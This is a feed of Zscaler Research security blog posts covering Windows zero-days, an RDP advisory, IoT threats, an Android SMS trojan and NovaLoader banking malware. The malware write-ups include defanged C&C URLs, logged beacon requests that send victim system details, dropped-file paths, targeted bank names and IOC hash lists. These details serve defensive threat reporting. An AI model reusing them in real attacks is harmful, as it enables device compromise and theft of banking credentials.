point for attackers to compromise the website by injecting malicious code and impacting the unsuspecting users visiting these sites. It is critical for website owners to apply the security update if they are using the vulnerable plugin, particularly because it is a pre-auth vulnerability and can lead to widespread compromise. The Zscaler ThreatLabZ team is actively tracking and reviewing all such malicious campaigns to ensure that our customers are protected.   IOCs blackawardago[.]com 216[.]10[.]243[.]93 List of compromised sites is available here.
Categories: Security Posts

Microsoft vulnerability: Source code published for three zero-day vulnerabilities in Windows

Zscaler Research - 52 min 35 sec ago
Background A security researcher (with the pseudonym SandboxEscaper) has discovered three zero-day vulnerabilities in Microsoft Windows. Their POC and source code have been released on GitHub. Two of these are local privilege escalation (LPE) vulnerabilities. They have been tested to work on Windows 10 only. The third vulnerability is a sandbox bypass vulnerability in Internet Explorer 11 (IE11). As of this writing, no patch has been released by Microsoft for these vulnerabilities.   What is the issue? The security researcher has published three POCs: angrypolarbearbug2, bearlpe, and sandboxescape.  The first vulnerability – angrypolarbearbug2 – can be exploited by performing specially crafted DACL (discretionary access control list) operations when the Windows Error Reporting service tries to write a DACL for the given Windows Error Reporting (.wer) file. Once successfully exploited, the vulnerability gives SYSTEM privileges to the attacker. The second vulnerability – bearlpe – targets the way the Windows task scheduler service uses the SetJobFileSecurityByName() function to write DACL for the job file. For this exploit to work, one needs to have "schtasks.exe" and "schedsvc.dll" files from Windows XP. Once successfully exploited, the vulnerability gives SYSTEM privileges to the attacker. The third vulnerability – sandboxescape – bypasses the IE11 sandbox and allows an attacker to execute code in IE low protection mode. To exploit this vulnerability, an attacker needs to inject a special DLL in the IE process. According to reports, this exploit cannot be triggered remotely.   What systems are impacted? The POC has been tested on Windows 10 32-bit and 64-bit and IE11.   Zscaler coverage Advanced Threat Signatures: Win32.Exploit.Bearlpe  Win32. Exploit.CVE.2019.0863 Win32.Exploit.Polarbearescape W32/Agent.NBHI Zscaler Cloud Sandbox provides proactive coverage against exploit payloads and advanced threats like ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage.
Categories: Security Posts

IoT traffic in the enterprise is rising. So are the threats.

Zscaler Research - 52 min 35 sec ago
Do you know exactly what IoT devices are on your network and how active they are? You’d better, because they might be opening the door to cybercrime. IoT devices are, of course, nonstandard computing devices that connect wirelessly to a network and have the ability to transmit data. These devices can communicate and interact over the internet, and they can be remotely monitored and controlled. Connected devices are part of a scenario in which every device talks to other related devices in an environment to automate home and industrial tasks, and to communicate usable sensor data to users, businesses and other interested parties. IoT devices are meant to work in concert for people at home, in industry, or in the enterprise. Enterprises around the globe have been adopting the use of IoT products to improve organizational efficiency, enhance communications, and to gain insight into system performance. According to Gartner, 20.4 billion IoT devices will be in use worldwide by 2020, and more than 65 percent of enterprises will adopt IoT products. That translates to quite a bit of budget being dedicated to these devices. IDC has predicted that IoT spending will reach $745 billion in 2019 and surpass the $1 trillion mark in 2022. That’s a 15 percent increase over 2018’s $646 billion. According to the same report, the U.S. and China will be spending the most at $194 billion and $182 billion, respectively. They are followed by Japan, Germany, Korea, France, and the UK.   Analyzing IoT transactions To help organizations get a better understanding of IoT activity in the enterprise, the ThreatLabZ research team analyzed IoT traffic across the Zscaler cloud during a one-month period between March and April 2019. The analysis looked at the types of devices in use, the protocols they used, the locations of the servers with which they communicated, and the frequency of their inbound and outbound communications, as well as IoT traffic patterns. The report, titled IoT in the Enterprise: an analysis of traffic and threats, provides a general overview of the most frequently seen device categories, then takes a deep dive into the transaction data for specific types of IoT devices. It also explores some of the security concerns around IoT devices, including the use of plain-text channels and the threat of malware.   Emerging threats The rapid adoption of these IoT devices has opened up new attack vectors for cybercriminals. And, as is often the case, IoT technology has moved more quickly than the mechanisms available to safeguard these devices and their users. Researchers have already demonstrated remote hacks on pacemakers and cars. And, in October 2016, a large distributed denial-of-service (DDoS) attack, dubbed Mirai, affected DNS servers on the east coast of the United States, disrupting services worldwide. This attack was traced back to hackers infiltrating networks through IoT devices, including wireless routers and connected cameras. In August 2017, the U.S. Senate introduced the IoT Cybersecurity Improvement Act, a bill addressing security issues associated with IoT devices. While it is a start, the bill only requires internet-enabled devices purchased by the federal government to meet minimum requirements, not the industry as a whole. However, it is being viewed as a starting point that, if adopted across the board, could pave the way to better IoT security industry-wide. One of the ThreatLabZ team’s discoveries was that the vast majority of IoT transactions were occurring over plain text channels, instead of the more secure SSL-encrypted channels. While a major security vulnerability, the use of unsecured channels is just one vulnerability with IoT devices. They are notorious for weak, preset passwords that often go unchanged.   Malware in IoT traffic As with just about every device connected to the internet, malware is also a threat to IoT devices. Each quarter, the Zscaler cloud blocks approximately 6,000 transactions from IoT-based malware and exploits. And, earlier this year, the Zscaler ThreatLabZ team analyzed certain threats that were targeting IoT devices. The fact is that there has been almost no security built into the IoT hardware devices that have flooded the market in recent years, and there’s typically no way to easily patch these devices. While many businesses have thought security for IoT devices unnecessary because nothing is stored on the devices, this isn’t the case. The Mirai botnet attack illustrated how exposed companies can be as a result of their IoT devices. Even though these devices continue to be an easy target for cyberattacks, enterprises can take steps to reduce the risk: Change default credentials to something more secure. As employees bring in devices, encourage them to be sure their passwords are strong and their firmware is always up to date. Install IoT devices on isolated networks (to prevent lateral movement), with restrictions on inbound and outbound network traffic. Restrict access to the IoT device as much as possible from external networks. Block unnecessary ports from external access. Apply regular security and firmware updates to IoT devices, in addition to securing the network traffic. Finally, deploy a solution to gain visibility of the shadow IoT devices that are already sitting inside the network and ensure above safeguards.   Advanced security for IoT devices IoT devices have become commonplace in enterprises from all industries and in nearly every corner of the globe. These devices were designed to help improve efficiency and expand communications, and organizations continue to explore new ways to incorporate these devices into everyday operations. Of course, many of the devices are employee-owned, and this is just one of the reasons they are a security concern. With all of these new connected devices, and the enormous amounts of associated data traversing your network and opening up new attack vectors for cybercriminals, can you trust your legacy network to provide adequate security? The security of your enterprise hinges on your answer. Read the entire report, IoT in the Enterprise: an analysis of traffic and threats. I’d like to thank our Sr. Security Researcher Viral Gandhi for his help in compiling the report. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  Deepen Desai is VP of Security Research at Zscaler
Categories: Security Posts

Critical Update: Windows Remote Desktop Services Vulnerability

Zscaler Research - 52 min 35 sec ago
Background Earlier today Microsoft released several security updates as part of its regular monthly updates known as Patch Tuesday. One of the issues that was patched in today's update, CVE-2019-0708, is critical, and all Windows users should apply the patches immediately, regardless of whether or not they are running the vulnerable operating system. Large organizations following 15/30/60-day patch cycles should consider making an exception and applying the patches as soon as possible, especially if running one of the vulnerable operating systems.   What is the issue?  CVE-2019-0708 is a remote code execution vulnerability in Microsoft Windows Remote Desktop Services that affects several older versions of the Windows operating system. What makes this vulnerability unique, and alarming, is that an attacker attempting to exploit the vulnerability does not have to be authenticated to the target machine and needs no interaction from the target user for the machine to be compromised. In other words, this can and most likely will be exploited by malware authors to spread payloads rapidly, from unpatched system to unpatched system. There have been no exploitations detected yet, but this is the type of vulnerability that could lead to another attack like WannaCry, which caused massive disruptions in organizations around the world in May 2017.   What systems are impacted? Windows XP, Windows 2003, Windows 7, Windows Server 2008 R2, and Windows Server 2008 operating systems are vulnerable. Windows 8 and Windows 10 operating systems are NOT vulnerable.   What can you do to protect yourself? Microsoft has been proactive in releasing security updates for the unsupported operating systems, given the critical nature of this vulnerability. Apply the security updates released by Microsoft immediately from the following locations: For supported operating systems: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EGB   For unsupported end-of-life operating systems [Windows XP and 2003]: https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708     Zscaler coverage Zscaler Cloud Sandbox provides proactive coverage against worm payloads and advanced threats like ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage.  
Categories: Security Posts

Working together to understand the threat landscape

Zscaler Research - 52 min 35 sec ago
As a society, we are more connected than ever before. Our community is no longer just the people living nearby. It is now a global community, made up of disparate individuals connected not by proximity but by the internet. As in almost any community, crime is a factor. In today’s digital society, that means cybercriminals, and they seem to be launching new attacks every day. These cybercriminals have gone from lone hackers to sophisticated criminal organizations, launching attacks on individuals, corporations, and governments. As these criminals have become more organized, the challenge in fighting them has become more difficult. If the cybercriminals are working together to increase their chances of success, it makes sense that those who fight these bad actors should also work together. Today, Verizon released its 2019 Data Breach Investigations Report, and I am proud that the Zscaler ThreatLabZ team once again actively contributed to the findings in this report. The Verizon 2019 Data Breach Investigations Report takes an in-depth look at security incidents and data breaches that occurred in 2018. The report analyzes 41,686 security incidents, of which 2,013 were confirmed data breaches. It looks at how the results have or have not changed over the years and digs into the overall threat landscape and the actors, actions, and assets that are present in breaches. The report delves into security incident patterns and describes how they correlate to the various industry verticals. In addition to these primary patterns, the report includes a subset of data to pull out financially motivated social engineering (FMSE) attacks, which are more focused on credential theft and duping people into transferring money into adversary-controlled accounts. Among the findings, the report revealed that 43 percent of data breaches occurred at small businesses, which tend to have less stringent security than larger organizations, making them an easier target. The most common tactic used in breaches was hacking (52 percent of the time), while errors (21 percent) and misuse by authorized users (15 percent) also led to breaches. And, as can be expected, financial gain was the most common motivation (71 percent). These results, and the others detailed in the report, are based on data collected from a variety of sources, including publicly disclosed security incidents, cases provided by the Verizon Threat Research Advisory Center (VTRAC) investigators, and external collaborators, such as ThreatLabZ. The year-to-year data includes new sources of incident and breach data as more organizations share information to improve the diversity and coverage of real-world events. The number of organizations providing data continues to grow, with 66 organizations external to Verizon now contributing to this report. This community of data contributors represents an international group of public and private entities that understand the importance of sharing information to gain a better understanding of the threats we all face on a daily basis. This is the second consecutive year that Zscaler has provided transaction data for the report. The ThreatLabZ team examined transactions processed in the Zscaler cloud during 2018, specifically looking for attempted phishing attacks and blocked malware. We also offered insights into each threat category with supporting telemetry information indicating the number of users affected by these security incidents and data breaches. It is heartening to see so many organizations coming together to share information in an ongoing effort to secure the internet and this digital world in which we all participate. Unfortunately, cybercriminals will continue developing new threats and attack methods, as long as there’s a potential payoff. And, since there is no sign of attackers stopping any time soon, it is up to all of us working in the cloud and cybersecurity industries to work together to make their job a lot more difficult. I think Gloria Macapagal Arroyo, the 14th President of the Philippines, said it very well: “The power of one, if fearless and focused, is formidable, but the power of many working together is better.” Download the entire Verizon 2019 Data Breach Investigations Report. Read more from the ThreatLabZ team. Read about Zscaler cloud security here. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Deepen Desai is vice president of security research at Zscaler 
Categories: Security Posts

From third-party Android store to SMS Trojan

Zscaler Research - 52 min 35 sec ago
In lieu of downloading and installing apps from the official Android app store, users often turn to third-party stores. The reasons vary, from wanting a particular app that isn’t available on the official store to seeking cracked apps—versions that have been modified to disable certain features, such as copyright protections—of official Android apps. Recently, the ThreatLabZ research team came across one of these third-party app stores that seemed to be hosting Android games. The store, called “Smart Content Store,” portrays itself as an Android app store and uses names such as sexy.smartcontentstore[.]com and games.smartcontentstore[.]com.     Fig 1: Third-party app store homepage   At first glance, the site appears to be an app store hosting Android games, but we were unable to download any apps. Clicking the Install option on any of the games, as seen in screenshot above, leads back to the same page.   Upon further examination, we found many direct links to APKs being downloaded from these domains. The image below shows the direct downloads of these APKs.   Fig 2: Zscaler dashboard   These apps have different package names and certificates, but every app exhibits the same functionality. We have provided an analysis of one of the apps below. (A complete list of apps can be found in the IOC at the end of blog.)   App summary APK Name: smartworld_-_WIN_-_500929091890143_-_.apk Package name: vaya.bailecito.epore.saturda Size: 2100203 bytes MD5: 091E91A9ED7202CD44DC5E1C4B3DCC90 Technical details As soon as the app is installed, it appears as a blank space. As shown in the screenshot below, the app icon and app name are missing. Upon clicking the space (the invisible icon) the app displays its first activity with two options: Smart World and Sexy World.     Fig 3: Invisible app icon and the first activity   During the initial phase, the app sends several requests to hxxp://play4funclub[.]com/public/notification/is-active, but during our analysis, we just received 301-Moved Permanently in response. These requests can be seen in the screenshot below.    Fig 4: Initial requests    Upon clicking either of the two options shown above, Smart World or Sexy World, the app asks for Administrator privileges, stating "To view all the porn videos you need to update. Click to activate.” This message can be seen in the screenshot below (left image).   Fig 5: Admin privileges   As soon as the victim activates admin rights, a request is sent to another domain. Nothing happened as a result of this request, so we believe that it is simply an indication to the attacker whether the victim has activated admin rights or not.    Fig 6: Request upon enabling admin rights   After a certain amount of time passes, the app starts sending requests to hxxp://app.in-spicy[.]com/scripts/app_sms_request_get_number.php with details about the victim's device and location. It sends the following information in its POST request: Android version Installation date Version Date (Date of request)  Country code Carrier  Device ID The screenshot below shows the request and response taking place between the compromised device and attacker:   Fig 7: Request and response related to the SMS message   The app acts according to the response received from the attacker’s domain. If the response contains "status":"OK", the app fetches the desired details from the response. In our case, it was a phone number and message body. Further, it sends an SMS message to that specific number and message body. This functionality is visible in the screenshot below where the response from the attacker is contained in paramJSONObject and is based on the response, sendTextMessage; this response initiates a routine that sends actual SMS messages.   Fig 8: Sending SMS functionality   During this phase of analysis, we observed several attempts to send SMS messages to different phone numbers with different text as the message body. This can result in high costs to the victim. Some examples of the SMS messages can be seen in the table below: Phone # Message Body 6768482371 message:france athletes employed 6857215675 message:experience iran yarn combines field 6768482371 message:luther exercise queens 2347003300131 message:hungary contributing task bird 6857215675 message:boolean wisconsin criticism verification republic 2347003300131 message:exchange audience nc medicaid 2347003300131 message:ut controlled salt customized consider 6768482371 message:legislative wayne brand hungarian 6768482371 message:consulting gui contrary eclipse 79697530171 message:boards tits difficulties 6768482371 message:royalty relay mv 6768482371 message:boards sie gabriel computer 6768482371 message:mods html chronic 6768482371 message:integer coleman monsters 6745596671 message:capabilities labels addiction 6768482371 message:checking upskirt football possibilities 6745596671 message:academics actively matrix ga 2347003300131 message:incidence quality mrs estimated default 6745590060 message:estate mexican legal flour 6768482371 message:cleared connectivity divx 2347003300131 message:cafe activists our constantly 6745596671 message:brush accepted role 6745596671 message:plain weed senators reform framing 6745596671 message:represents fig answers signup 6745596671 message:animation failure lucas browser poetry 2347003300131 message:biodiversity present solving herbal regulations 6857215675 message:shakira wanna movie freight 6768482371 message:shipping uzbekistan senators optimize basically 6857215675 message:folks tamil cooper 6857215675 message:picking maine shapes men wives   This app also has permission to view the victim’s contact list, which means the app can easily spread itself using those contacts. We also found other high-level permissions and we are analyzing the sample further to determine their functions and potential impact. We will update this report with any interesting findings.   Conclusion The Zscaler Cloud Sandbox successfully flagged the sample as malicious based on indicators found in the sample, as shown in the report screenshot below.   Fig 9: Zscaler Cloud Sandbox   Zscaler advises Android users to download apps only from official app stores. Using third-party stores may lead to the installation of apps that have hidden, malicious intentions, as described in this case. We also advise users to keep the Unknown Sources option off at all times on your Android device. Keep this off will prevent any third-party app to directly get installed on the device.    IOCs Domains app.in-spicy(dot)com insidecontentsp(dot)com incontsmart(dot)com   MD5 044b97016fdcd22c8c2211014e65c562 bb5a4cea098a29ac8533c561784908b4 58f237f346d81385eaa2005cd642e28c f50091fbe2fef0c9501f242afb356c96 2cbf13b90b76300f9668c2660b9cbc35 5c68ff95c2278da0fcc13b4c46f7978b 091e91a9ed7202cd44dc5e1c4b3dcc90 88c2ccec249ff6df0fd525e09e700861 8ac5e78f4bc7212fcadd805c924ba67c eaa2f149f33e35906095857064721044 60772ad9808a5bab595f3459e8d5bb4c 9f4ff0d5425f1542fe4aef50cb1b20dd 64d5bba5e3a18f971ee5904ccc9b7826 20614d2d2471b2a7fcfbbf67f0fdbfb6 6f31a49153b6b504ce8804c91113852f d717c2c4ebce47d40aea491e911b1c5d 3124ae1a165d2fd1f5ab4e6b83a1100a 4f3289108728c33866e62e99a1fed40d 1a027810c28fad34c7590ddb18dc6a51 4fd81f83d8cb40f6fb0bd1ad94b8ea7f 32131606ac4448683dad9148e4754f81 afe96ae477648b152e7434ac5c0790c6 793fc48a4947a3c19efc570ba8af1235 62ff00af19ad0ed02ab65f3d8a6ceb27 61d9506df0a016435297829bb386e4b8 61ded4d4c3268c354a794dc4c6dea530 81685083658d7e839e68489391f15a05 2bcc9865edb66883b82f43c34e6ac19d a8a75b3055a9aa27a26d326061173287 8dbbcdfa3d4d1207e325890680f98d4a 58271be93858eb5baeaa401fe1d583bb a350e8b88d586e26e9dc858c83407ebc a5219ee0c3c10ca8db991d05fe34b9b0 ca17d9260a247e6457876a2f98e3fab7 064a46635c0bda86bcc42ae484ee5c25 874e3af735b6e17ddd596c29e2fc55d5 cfe0d20dbf674f8619584c850eda2186 0cadfdf04df0f3dba0e8a0fdb087993b dada3ef23b89c9e0f535aa7dd49360e1 b34d3dbd6241f63670e010f7da05630b 43a70f5f1929e882894a023a67ffe23f 00b9c19f229892ad6f0c45f75a5bf729 154ee512e7142f56118209ec9375433d 4cd7745e9f0043ed3da046f88249b221 1efefb04a779b5cd7ccfc1aa4b104fc1   22b5cec87a9227abbaa6f120f4809230   0648e6c78d85ce62eed06fbb94283712
Categories: Security Posts

NovaLoader, yet another Brazilian banking malware family

Zscaler Research - 52 min 35 sec ago
As part of our daily threat tracking activity, ThreatLabZ researchers recently came across an interesting Brazilian banking malware campaign. The malware, NovaLoader, was written in Delphi and made extensive use of Visual Basic Script (VBS) scripting language. Although the final payload was not entirely new and has been discussed by other security researchers, we found that the multi-stage payload delivery was unique.   Delivery method In earlier documented campaigns, the delivery methods for this malware included spam, social engineering, and fake sites for popular software such as Java. The malware operators use a variety of available options to ensure malware delivery and try to avoid detection by security products. They often do so by abusing popular legitimate services like Dropbox, GitHub,  Pastebin, AWS, GitLab, and others, as well as URL shorteners and dynamic DNS services such as No-IP and DynDNS. NovaLoader is known to use AutoIt, PowerShell, and batch scripts in the infection chain, but this is the first time we have seen it use VBS. In this campaign, it is also using encrypted scripts instead of simply obfuscated ones. Fig.1: NovaLoader Infection flow   Main Dropper MD5: 4ef89349a52f9fcf9a139736e236217e The main dropper is very simple; its only purpose is to decrypt the embedded VB script and run the decrypted script.   Fig. 2: Stage 1 VB script decryption loop   Stage 1 Script Embedded script before and after decryption: Fig. 3: VB script before and after decryption This VBS file will decrypt a URL (dwosgraumellsa[.]club/cabaco2.txt) to download another encrypted script and run that after decryption. D Fig. 4: Download request for the next stage, an encrypted payload   Stage 2 Script Downloaded VB script looks like the following after decryption: Fig. 5: VBS after decryption The VB script will send a GET request to “http://54.95.36[.]242/contaw.php” , possibly to let the command-and-control (C&C) server know that it is running on the system. After that it will try to detect presence of virtual environment using Windows Management Instrumentation (WMI) queries, as shown below. Fig. 6: VM detection code NovaLoader will drop and copy following executable files into the directory C:\\Users\\Public\\: C:\\Windows\\(system32|SysWOW64)\\rundll32.exe C:\\Windows\\(system32|SysWOW64)\\Magnification.dll Fig. 7: C&C notification request After that it will download a following files from 32atendimentodwosgraumell[.]club 32atendimentodwosgraumell[.]club/mi5a.php decrypted and saved at C:\Users\Public\{random}4.zip 32atendimentodwosgraumell[.]club/mi5a1.zip saved at C:\Users\Public\{random}1.zip 32atendimentodwosgraumell[.]club/mi5asq.zip saved at C:\Users\Public\{random}sq.zip Then it will send multiple GET requests to “54.95.36.242/contaw{1-7}[.]php” Fig. 8: Multiple C&C requests GET /contaw.php GET /contaw2.php?w={redacted}BIT-PC_Microsoft%20Windows%207%20Professional%20_True GET /contaw3.php?w={redacted}BIT-PC GET /contaw4.php?w={redacted}BIT-PC GET /contaw5.php?w={redacted}BIT-PC GET /contaw6.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM GET /contaw7.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_ It will also drop several files into the C:\Users\Public\ directory: Dropped files MD5 Comment DST.exe 51138BEEA3E2C21EC44D0932C71762A8 copied rundll32.exe I 3DC26D510907EAAC8FDC853D5F378A83 encypted file containing various values like version, extension etc. I_ A34F1D7ED718934185EC96984E232784 encrypted configuration file KC 89473D02FEB24CE5BDE8F7A559631351 similar to file named "I" mwg.dll F3F571288CDE445881102E385BF3471F copied magnification.dll PFPQUN.DST 8C03B522ACB4DDC7F07AB391E79F1601 support dll to decrypt main payload PFPQUN1.DST F3D4520313D05C66CEBA8BDA748C0EA9 encrypted main payload winx86.dll 87F9E5A6318AC1EC5EE05AA94A919D7A Sqlite dll Fig. 9: Files dropped by script And, finally, it will execute the decrypted DLL exported function using the copied rundll32.exe file. Fig. 10: Executing the stage-3 payload The stage-3 payload is a DLL file that acts as a loader for the final payload. It is run via rundll32.exe and its purpose is to decrypt and load the final payload.   Final payload The final payload is written in Delphi. It has multiple capabilities including stealing victim's credentials for several Brazilian banks. It monitors the browser window’s title for bank names and if a targeted tab is found, the malware can take control of the system and block the victim from the real bank's page to do its nefarious activities by communicating to its C&C. Its activity is quite similar to the well-known Overlay RAT. Some of the interesting commands used by the malware include: Command String Description To stabilize socket connection Sends infected OS details Checking status of the connection Close all connections Sends keystrokes to the active application window Set mouse position Set mouse left button down Set mouse left button up Set mouse right button up Set mouse right button down Share compromised system desktop Check gets in C&C response to check if data is correct reply with Fig. 11: NovaLoader C&C commands There were many interesting strings related to the Brazilian banks found in malware: Strings in malware Corresponding bank site caixa http://www.caixa.gov.br bancodobrasil https://www2.bancobrasil.com.br bbcombr https://www.bb.com.br/ bradesco https://banco.bradesco/ santander https://www.santander.com.br/ bancodaamazonia https://www.bancoamazonia.com.br/ brbbanknet https://brbbanknet.brb.com.br/netbanking/ banese https://www.banese.com.br/ banestes https://www.banestes.com.br/ bancodoestadodopar https://www.banpara.b.br/ bancobs2 https://www.bs2.com/ citibankbrasil https://www.citibank.com.br bancofibraonline https://www.bancofibra.com.br/ agibank https://www.agibank.com.br/ bancoguanabara http://www.bancoguanabara.com.br/ ccbbrasil http://www.br.ccb.com bancoindusval https://www.bip.b.br/ir internetbankingbancointer https://internetbanking.bancointer.com.br/ modalbanking https://modalbanking.modal.com.br/ bancopan https://www.bancopan.com.br/ pineonline https://www.pine.com/ Fig. 12: Some of the targeted bank strings found in the malware   Conclusion The Brazilian actors are among the top contributors of global cybercrime and they are always coming up with new ways to infect their targets using spam, social engineering, and phishing. In this campaign, we have observed them targeting Brazilian financial institutions using malware written in Delphi. The Zscaler ThreatLabZ team is actively tracking and reviewing all malicious payloads to ensure that our customers are protected.   IOCs Md5 60e5f9fe1b778b4dc928f9d4067b470b 4ef89349a52f9fcf9a139736e236217e 100ff8b5eeed3fba85a1f64db319ff40 99471d4f03fb5ac5a409a79100cd9349 cb2ef5d8a227442d0156de82de526b30 a16273279d6fe8fa12f37c57345d42f7 ac4152492e9a2c4ed1ff359ee7e990d1 fdace867e070df4bf3bdb1ed0dbdb51c 4d5d1dfb84ef69f7c47c68e730ec1fb7 6bf65db5511b06749711235566a6b438 c5a573d622750973d90af054a09ab8dd ef5f2fd7b0262a5aecc32e879890fb40 35803b81efc043691094534662e1351c 34340c9045d665b800fcdb8c265eebec a71e09796fb9f8527afdfdd29c727787 5a9f779b9cb2b091c9c1eff32b1f9754 a7117788259030538601e8020035867e cb9f95cec3debc96ddc1773f6c681d8c a7722ea1ca64fcd7b7ae2d7c86f13013 URLs 185[.]141[.]195[.]5/prt1.txt 185[.]141[.]195[.]81/prt3.txt 185[.]141[.]195[.]74/prt1.txt dwosgraumellsa[.]club/cabaco2.txt wn5zweb[.]online/works1.txt 23[.]94[.]243[.]101/vdb1.txt 167[.]114[.]31[.]95/gdo1.txt 167[.]114[.]31[.]93/gdo1.txt
Categories: Security Posts
Syndicate content